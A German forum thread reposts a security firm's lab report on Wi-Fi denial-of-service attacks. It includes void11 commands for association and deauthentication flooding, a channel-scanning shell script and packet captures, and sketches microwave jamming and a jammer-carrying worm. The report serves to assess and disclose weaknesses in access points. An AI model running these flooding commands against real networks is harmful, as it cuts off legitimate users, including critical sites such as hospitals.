Technomagie ... oder so

XaTuring lebt!
Benutzeravatar
Cpt. Bucky Saia
Warlord der Herzen|Warlord der Herzen|Warlady der Herzen
Beiträge: 6824
Registriert: 9. September 2010, 09:36
Disorganisation: Comapony Kabale, Starfish Cabal, Company, D.A.D.
Wohnort: eine alte Haunebu IV Flugscheibe

Re: Technomagie ... oder so

Beitrag von Cpt. Bucky Saia »

Ich überleg grade welche Dokumente ich damit verzieren könnte :D
"Wir sind nicht der Abschaum. Wir sind der schillernde, toxische Schleim der auf dem Abschaum schwimmt ..."
Seine Spektralität Cpt. Bucky "Saia" Sternentänzer
alias Papst Cerrynt Eiledol von Welodd alias Nede E Lym von Leng alias Baktus Paradonti alias Dr. Dromis Seth, Master Phool im Outer Space, (Mitbe)Gründer der Univers-City of Sockovia, Moonman Winter Dream, aus der dritten Vergangenheit, General Error der Invasionstruppen, Captain der ersten erisischen Kompanei westlich von Osten, Hüter des hailigen GNARV und anderer nutzloser Dinge, Dunkelelfischer Bischof von Betty, Vorstand der Company auf Lebenszeit, Ernenner des Fonsis auf Zeit, der während eines Bades ehrenhaft erleuchtete, Beschützer des rauchenden Orakels am Stiel, exzellenter Züchter der feinsten Flugaffen nördlich von Reykjavík, Eiliger Hailigenpfleger der Aktion 23, (Er)Finder des Starfish Mythos, Transluzenter Geheimniskrämer und unter der Hand Händler, Schieberkönig der Unwissenden, Verfasser von nicht geschriebenen Werken, autorisierter Verkäufer von "Das LichtTM" und "SeelenheilTM", eingeweihter Oberanti der D.A.D. sowie Pharao Hypothep alias Pharao Pontifex zu Popanz von Paranoia Panoptikum, Bürokrat im Büro für Zweckentfremdung, Anwender von Methoden, Knazler und freier Beratzer auf Schloß Gammelot in Mottrop´s Tradition, Vorsichtsratsaufstand im Konglomerat, Eidechsenkönig und Universalgott Nr. 5
Benutzeravatar
Cpt. Bucky Saia
Warlord der Herzen|Warlord der Herzen|Warlady der Herzen
Beiträge: 6824
Registriert: 9. September 2010, 09:36
Disorganisation: Comapony Kabale, Starfish Cabal, Company, D.A.D.
Wohnort: eine alte Haunebu IV Flugscheibe

Re: Technomagie ... oder so

Beitrag von Cpt. Bucky Saia »

Im altbewährten Copy Paste verfahren ein weiterer Abschnitt aus den Dokumenten des Archivs
Jam the WLAN
(Pierre Kroma, Sebastian Schreiber, SySS GmbH)
WLAN-Hotspots schießen in letzter Zeit wie Pilze aus dem Boden. Sei es wegen des
Komforts oder weil die Architektur eines Gebäudes es erzwingt - viele möchten heutzutage
auf WLAN umsteigen.
Längst haben WLANs schon Einzug in Hochregallager, Fuhrparkunternehmen,
Fertigungsstraßen und auch Krankenhäuser gehalten. Mit deren zunehmenden Einsatz ergibt
sich die Notwenigkeit einer hohen Verfügbarkeit dieser Funk-Netze. Im Labor der SySS
GmbH wurde geprüft, ob die IEEE 802.11a/b/g/h Implementierungen auch gegen Angriffe
auf die Verfügbarkeit (DoS-Attacken) abgesichert sind.
Folgende DoS – Attacken wurden getestet:
1. Association flooding
2. Authentication flooding
3. De-Authentication flooding
Im folgenden sollen nun diese drei Methoden etwas näher beschrieben und natürlich wieder auf ihre tauglichkeit analysiert werden.
Association Flooding
Beim Association Flooding wird der parallele Zugriff mehrerer WLAN-Clients „simuliert“.
Viele Accesspoints können nur ~255 parallele Association-Anfragen von WLAN-Clients
abarbeiten. Dabei erhält jeder WLAN-Client eine eigene ID (=AID). Aufgrund der massiven
Anfragen stehen dem Accesspoint keine freien AIDs für legitime Clients mehr zur Verfügung.
Bild
Mit dem Tool „void11“ (1) lässt sich ein solcher Angriff wie folgt starten:
void11_pentesting –t 3 –l ./matchlist –p 1 wlan0
Die Parameter im Einzelnen:
-t 3 = association flooding
-l file = Matchlisten-Datei
-p 1 = es wird nur der Inhalt der Matchliste berücksichtigt

(1 Homepage: http://www.wlsec.net/download/wlsec/void11/ )

Die Match-Liste enthält immer einen Eintrag pro Zeile und kann z.B. wie folgt aufgebaut
sein:
B 00:11:22:33:44:55
S tsunami
Die erste Zeile definiert eine BSSID; die zweite Zeile eine SSID. Der obige Aufruf von
void11 erzeugt damit folgendes Paket:
Frame 43091 (43 bytes on wire, 43 bytes captured)
Arrival Time: Jan 30, 2004 13:39:04.029802000
Time delta from previous packet: 0.033642000 seconds
Time since reference or first frame: 2281.109835000 seconds
Frame Number: 43091
Packet Length: 43 bytes
Capture Length: 43 bytes
IEEE 802.11
Type/Subtype: Association Request (0)
Frame Control: 0x0000 (Normal)
Version: 0
Type: Management frame (0)
Subtype: 0
Flags: 0x0
Duration: 314
Destination address: 00:11:22:33:44:55 (00:11:22:33:44:55)
Source address: 00:bc:33:77:13:20 (00:bc:33:77:13:20)
BSS Id: 00:11:22:33:44:55 (00:11:22:33:44:55)
Fragment number: 0
Sequence number: 957
IEEE 802.11 wireless LAN management frame
Fixed parameters (4 bytes)
Capability Information: 0x0001
Listen Interval: 0x0001
Tagged parameters (15 bytes)
[Malformed Packet: IEEE 802.11]
"Wir sind nicht der Abschaum. Wir sind der schillernde, toxische Schleim der auf dem Abschaum schwimmt ..."
Seine Spektralität Cpt. Bucky "Saia" Sternentänzer
alias Papst Cerrynt Eiledol von Welodd alias Nede E Lym von Leng alias Baktus Paradonti alias Dr. Dromis Seth, Master Phool im Outer Space, (Mitbe)Gründer der Univers-City of Sockovia, Moonman Winter Dream, aus der dritten Vergangenheit, General Error der Invasionstruppen, Captain der ersten erisischen Kompanei westlich von Osten, Hüter des hailigen GNARV und anderer nutzloser Dinge, Dunkelelfischer Bischof von Betty, Vorstand der Company auf Lebenszeit, Ernenner des Fonsis auf Zeit, der während eines Bades ehrenhaft erleuchtete, Beschützer des rauchenden Orakels am Stiel, exzellenter Züchter der feinsten Flugaffen nördlich von Reykjavík, Eiliger Hailigenpfleger der Aktion 23, (Er)Finder des Starfish Mythos, Transluzenter Geheimniskrämer und unter der Hand Händler, Schieberkönig der Unwissenden, Verfasser von nicht geschriebenen Werken, autorisierter Verkäufer von "Das LichtTM" und "SeelenheilTM", eingeweihter Oberanti der D.A.D. sowie Pharao Hypothep alias Pharao Pontifex zu Popanz von Paranoia Panoptikum, Bürokrat im Büro für Zweckentfremdung, Anwender von Methoden, Knazler und freier Beratzer auf Schloß Gammelot in Mottrop´s Tradition, Vorsichtsratsaufstand im Konglomerat, Eidechsenkönig und Universalgott Nr. 5
Benutzeravatar
Cpt. Bucky Saia
Warlord der Herzen|Warlord der Herzen|Warlady der Herzen
Beiträge: 6824
Registriert: 9. September 2010, 09:36
Disorganisation: Comapony Kabale, Starfish Cabal, Company, D.A.D.
Wohnort: eine alte Haunebu IV Flugscheibe

Re: Technomagie ... oder so

Beitrag von Cpt. Bucky Saia »

Deauthentication flooding
Beim Deauthentication flooding wird einem bereits authentifiziertem WLAN-Client ein Paket
zugesandt, welches ihn auffordert, sofort die Verbindung zum Accesspoint zu beenden
Bild
Eine solche Attacke kann mit folgenden Schritten durchgeführt werden:
1. Aktivierung eines AP-Treibers (unter Linux: z.B.. hostap2):

Code: Alles auswählen

iwpriv wlan0 hostapd 1
2. Ermitteln der zu spoofenden BSSID mit . Kismet3/Ethereal4) oder folgendem Shell-
Skript:

Code: Alles auswählen

#!/bin/sh
iwconfig wlan0 mode master
while(true);
do for i in $(seq 1 14);
do iwconfig wlan0 channel $i;
sleep 0.2;
echo -n "$i. ";
done;
done 2>/dev/null
3. Aussendung der Deauthentication-Paketen mit der gespooften AP-BSSID:

Code: Alles auswählen

void11_penetration -t 1 wlan0
Dabei wird eine Vielzahl von Paketen verschickt, die wie folgt aussehen:

Code: Alles auswählen

Frame 359 (30 bytes on wire, 30 bytes captured)
Arrival Time: Jan 30, 2004 13:08:21.686722000
Time delta from previous packet: 0.020377000 seconds
Time since reference or first frame: 438.766755000 seconds
Frame Number: 359
Packet Length: 30 bytes
Capture Length: 30 bytes
IEEE 802.11
Type/Subtype: Deauthentication (12)
Frame Control: 0x00C0 (Normal)
Version: 0
Type: Management frame (0)
Subtype: 12
Flags: 0x0
Duration: 0
Destination address: ff:ff:ff:ff:ff:ff (ff:ff:ff:ff:ff:ff)
Source address: 00:11:22:33:44:55 (00:11:22:33:44:55)
BSS Id: 00:11:22:33:44:55 (00:11:22:33:44:55)
Fragment number: 0
Sequence number: 2725
IEEE 802.11 wireless LAN management frame
Fixed parameters (2 bytes)
Reason code: Previous authentication no longer valid (0x0002)
Bei der oben aufgeführten Attacke wurde ein Deauthentification Paket vom Accesspoint mit
der BSSID 00:11:22:33:44:55 an die Broadcast Adresse FF:FF:FF:FF:FF:FF gesendet.
Dadurch werden sämtliche WLAN-Clients ihre Verbindung zu diesem Accesspoint
unterbrechen. Diese Attacke kann durch die Angabe von dedizierten Clientadressen noch
stärker fokussiert werden; so wäre eine gezielte Attacke eines WLAN-Clients möglich,
während die restlichen Clients das WLAN, weiterhin ungestört benutzen könnten.
Die Angriffsziele können wie üblich mit Matchlisten genauer spezifiziert werden:

Code: Alles auswählen

void11_pentesting –t 1 –l ./matchlist –p 1 wlan0
Zusammenfassung
Für die oben aufgeführten Attacken, ist notwendig, dass der Angreifer eine WLAN-Karte mit
Prism2-Chipsatz verwendet. In diesen Tests wurde die schon etwas betagte 802.11b SMC
Card 2632W eingesetzt. Der von void11 benötigte Hostap-Treiber arbeitet derzeit nur mit
Intersil's Prism2/2.5/3 Chipsätzen zusammen.
Die Untersuchung aktueller 802.11b/g Accesspoints der Hersteller USR, Belkin, Trust, Intel,
3COM, Lancom, T-Sinus, Apple ergab folgendes.
• Gegen Association und Authentication Flooding mit der 802.11b Prism-PCMCIAKarte
sind heute fast alle getesteten 802.11b/g Accesspoint immun. Negativ fiel nur
der Apple Accesspoint „AirPort Extreme“ auf. Dieser Accesspoint ist sofort nachdem
die WLAN-Attacken gestartet wurden, nicht mehr erreichbar, wie der folgende
„ping“-Test zeigt:
Bild
• Das Deauthentication Flooding funktioniert hingegen mit jedem WLAN-Client, da die
momentan verwendeten IEEE 802.11-Standards keine Absicherungsmethoden
vorsehen , die eine sicherer Verifizierung der erhaltenen Meldungen ermöglichen.
In einschlägigen Mailinglisten werden weitere DoS–Attacken diskutiert, die den drei
beschriebenen ähnlich sind; dabei werden z.B. verschiedene Management Frames des
Enhanced Authentification Protocols missbraucht. (EAPoL ID-Flood, EAPoL Logoff-Flood,
EAPoL Start-Flood)
Fußnote hat geschrieben:2 AP-Treiber für Linux: http://hostap.epitest.fi/
3 Kismet (802.11 layer2 WLAN Detektor, Sniffer und IDS System): http://www.kismetwireless.net/
4 Ethereal Paketanalyzer: http://www.ethereal.com
Hardware Störsender
Die oben beschriebenen DoS Attacken arbeiten Software-gestützt. Eine weitere
Angriffsmöglichkeit besteht darin, das verwendete Frequenzband 2.4GHz (802.11b/g) oder 5
GHz (802.11a/h) mittels eines ausreichend starken Spezialsenders zu stören. Um ein 2.4 GHz
Netz zu stören, könnte es schon ausreichen, eine manipulierte Mikrowelle zu betreiben, bei
der die elektromagnetischen Wellen bewusst außerhalb des Gerätes freigesetzt werden.
Derartiger Attacken können am Markt verfügbare WLAN-IDS Systeme zwar erkennen, eine
Ortung der Störquelle ist aufgrund von Reflexionen an Gebäuden und Wenden jedoch sehr
schwierig. Der Einsatz von WLANs bietet sich damit vorerst in kritischen Bereichen nicht an.
Katastrophenszenario WLAN-WurmPCs und Laptops, auch Supermarkt-Ware werden bereits
mit fest eingebauten WLAN-Karten ausgeliefert. Laut dem Analysten IDC werden im Jahr
2004 etwa 50 Millionen neue Notebooks mit WLAN-Karten verkauft.
Dass Angreifer unter Anwendung von Würmern Windows-binärdateien auf einer Vielzahl
von Systemen verbreiten und ausführen können haben die jüngsten Würmer Mydoom (siehe:
http://www.bsi.bund.de/presse/pressinf/mydoom300104.htm) und dessen Nachfolger (unter
anderem http://www.heise.de/newsticker/meldung/print/44432) eindrucksvoll bewiesen.
Momentan führen solche Würmer z.B. gemeinsame DoS-Attacken gegen das Unternehmen
SCO durch; ein Angreifer könnte aber den Wurm dergestalt modifizieren, dass anstatt der
ursprünglichen „Schadensroutine“ ein WLAN-Jammer eingesetzt wird. Dann wären
sämtliche WLANs in einer Entfernung von bis zu 300 m zum infizierten System unbrauchbar.
Sollte sich ein solcher Wurm stark verbreiten und beispielsweise nur 1% der Systeme mit
WLAN-Karten befallen, würden die WLANs in sämtlichen IT-lastigen Gebierte unserer
Städte ausfallen. So attraktiv und komfortabel die Technologie „WLAN“ auch ist; eine
Abhängigkeit von ihr ist um jeden Preis zu vermeiden.
Die „Schadensroutinen“ der o.g. Würmer könnte z.B. von einem Angreifer durch eine sehr
einfache WLAN-Jammer-Software ersetzt werden. Infiziert der Wurm ein System mit
WLAN-Karte könnten alle WLANs in Entfernung von bis 300m unbrauchbar werden. Sollte
sich der Wurm stark verbreiten und nur 1% der Systeme mit WLAN-Karten befallen werden,
würde dies ausreichen um die WLAN-Infrastruktur in einem IT-lastigen Gebiet ausfallen zu
lassen. So attraktiv und komfortabel die WLAN-Technologie auch ist, eine 100%ige-
Abhängigkeit von ihr ist um jeden Preis zu vermeiden.
"Wir sind nicht der Abschaum. Wir sind der schillernde, toxische Schleim der auf dem Abschaum schwimmt ..."
Seine Spektralität Cpt. Bucky "Saia" Sternentänzer
alias Papst Cerrynt Eiledol von Welodd alias Nede E Lym von Leng alias Baktus Paradonti alias Dr. Dromis Seth, Master Phool im Outer Space, (Mitbe)Gründer der Univers-City of Sockovia, Moonman Winter Dream, aus der dritten Vergangenheit, General Error der Invasionstruppen, Captain der ersten erisischen Kompanei westlich von Osten, Hüter des hailigen GNARV und anderer nutzloser Dinge, Dunkelelfischer Bischof von Betty, Vorstand der Company auf Lebenszeit, Ernenner des Fonsis auf Zeit, der während eines Bades ehrenhaft erleuchtete, Beschützer des rauchenden Orakels am Stiel, exzellenter Züchter der feinsten Flugaffen nördlich von Reykjavík, Eiliger Hailigenpfleger der Aktion 23, (Er)Finder des Starfish Mythos, Transluzenter Geheimniskrämer und unter der Hand Händler, Schieberkönig der Unwissenden, Verfasser von nicht geschriebenen Werken, autorisierter Verkäufer von "Das LichtTM" und "SeelenheilTM", eingeweihter Oberanti der D.A.D. sowie Pharao Hypothep alias Pharao Pontifex zu Popanz von Paranoia Panoptikum, Bürokrat im Büro für Zweckentfremdung, Anwender von Methoden, Knazler und freier Beratzer auf Schloß Gammelot in Mottrop´s Tradition, Vorsichtsratsaufstand im Konglomerat, Eidechsenkönig und Universalgott Nr. 5
Antworten